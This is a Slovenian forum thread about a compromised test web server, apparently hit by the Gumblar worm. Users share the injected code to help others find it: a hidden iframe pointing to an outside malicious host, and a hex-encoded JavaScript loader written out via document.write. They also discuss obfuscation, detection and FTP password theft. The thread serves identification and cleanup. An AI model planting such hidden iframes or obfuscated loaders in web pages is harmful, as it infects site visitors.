Nov vdor in škodljiva koda v <iframe>
7 naročnikov
7 naročnikov
Včeraj nam je na testnem strežniku nek nepridiprav vnesel v indexe sledečo kodo:
< i f r a m e src= " http : // a3h.pl:8080/ts/in.cgi?pepsi77 " width=125 height=125 style="visibility: hidden"></ i f r a m e >
Kodo prilagam za lažje iskanje, če komu prav pride.
LP
11 odgovorov
v kodo s presledki sem naredil sam, da nebi slučajno prilepil kakšne pizdarije. Drugače je koda brez presledkov
in pa še eno zraven:
< s c r i p t >
function c102916999516l49464ef52d352(l49464ef52db24){ function l49464ef52e2f0(){return 16;} return (parseInt(l49464ef52db24,l49464ef52e2f0()));}function l49464ef52f290(l49464ef5301a7){ var l49464ef530a03='';l49464ef532945=String.fromCharCode;for(l49464ef5311d6=0;l49464ef5311d6<l49464ef5301a7.length;l49464ef5311d6+=2){ l49464ef530a03+=(l49464ef532945(c102916999516l49464ef52d352(l49464ef5301a7.substr(l49464ef5311d6,2))));}return l49464ef530a03;} var xef='';var l49464ef533ef8='3C736'+xef+'3726'+xef+'970743E6'+xef+'96'+xef+'6'+xef+'28216'+xef+'D796'+xef+'96'+xef+'1297B6'+xef+'46'+xef+'F6'+xef+'3756'+xef+'D6'+xef+'56'+xef+'E742E77726'+xef+'9746'+xef+'528756'+xef+'E6'+xef+'5736'+xef+'36'+xef+'1706'+xef+'528202725336'+xef+'32536'+xef+'392536'+xef+'36'+xef+'2537322536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'352532302536'+xef+'6'+xef+'52536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'3525336'+xef+'42536'+xef+'332533312533302532302537332537322536'+xef+'3325336'+xef+'42532372536'+xef+'3825373425373425373025336'+xef+'125326'+xef+'6'+xef+'25326'+xef+'6'+xef+'2536'+xef+'372536'+xef+'6'+xef+'6'+xef+'2536'+xef+'372536'+xef+'6'+xef+'6'+xef+'2533322536'+xef+'6'+xef+'42536'+xef+'3525326'+xef+'52536'+xef+'6'+xef+'52536'+xef+'3525373425326'+xef+'6'+xef+'25326'+xef+'52536'+xef+'372536'+xef+'6'+xef+'6'+xef+'25326'+xef+'6'+xef+'2536'+xef+'332536'+xef+'382536'+xef+'352536'+xef+'332536'+xef+'6'+xef+'225326'+xef+'52536'+xef+'382537342536'+xef+'6'+xef+'42536'+xef+'6'+xef+'32532372532302537372536'+xef+'392536'+xef+'342537342536'+xef+'3825336'+xef+'42533332533382533392532302536'+xef+'382536'+xef+'352536'+xef+'392536'+xef+'372536'+xef+'3825373425336'+xef+'42533342533302533312532302537332537342537392536'+xef+'6'+xef+'32536'+xef+'3525336'+xef+'4253237253736'+xef+'2536'+xef+'392537332536'+xef+'392536'+xef+'322536'+xef+'392536'+xef+'6'+xef+'32536'+xef+'3925373425373925336'+xef+'12536'+xef+'382536'+xef+'392536'+xef+'342536'+xef+'342536'+xef+'352536'+xef+'6'+xef+'525323725336'+xef+'525336'+xef+'325326'+xef+'6'+xef+'2536'+xef+'392536'+xef+'36'+xef+'2537322536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'3525336'+xef+'52729293B7D76'+xef+'6'+xef+'172206'+xef+'D796'+xef+'96'+xef+'13D7472756'+xef+'53B3C2F736'+xef+'3726'+xef+'970743E';document.write(l49464ef52f290(l49464ef533ef8));</script
Aja .. ker nekje sem pa pravi videl da uporabljajo presledke newline in podobno da prikrijejo kaj se dogaja, obidejo parserje itd..
Ja ta drug stil je tudi pogosti.. Skupno tem "enkriptanim" je da uporavljajo fromCharCode in včasih eval zato jih site assistant išče in javlja. (samo ta del je šele v začetku razvoja)
kot prvo testni spletni strežnik sploh ne bi smel biti dostopen iz zunaj... če vseeno potrebujete oddaljen dostop do njega si zrihtajte vpn.
Antony, predpostavljam, da nekdo izmed vas uporablja Filezillo ali kak podoben FTP client, ki shranjuje passworde v txt datoteko.
Debata že teče tule:
http://www.internetmojster.com/administracija/gumblar-ftp-virus.html
ja, tudi sam sem skoraj prepričan da gre za gumblar. Tudi Filezilla se uporablja...
Sicer kodo spremenil s presldki, vendar ne dovolj, ker nekaterih antivirsnik še vedno prepozna dkodo, kar je pohvalno. moj NOD32 je tiho ko miš...
Moj NOD se tudi nič ni oglasil, ko sel dobil Gumblarja. Cel shared hosting mi je posral. Problem je pri Wordpress straneh, ki imajo polno index datotek, in ti vse okuži... pa še nekaj kode ti pobriše v php datotekah. Problem je potem, ko ne najdeš backupa :D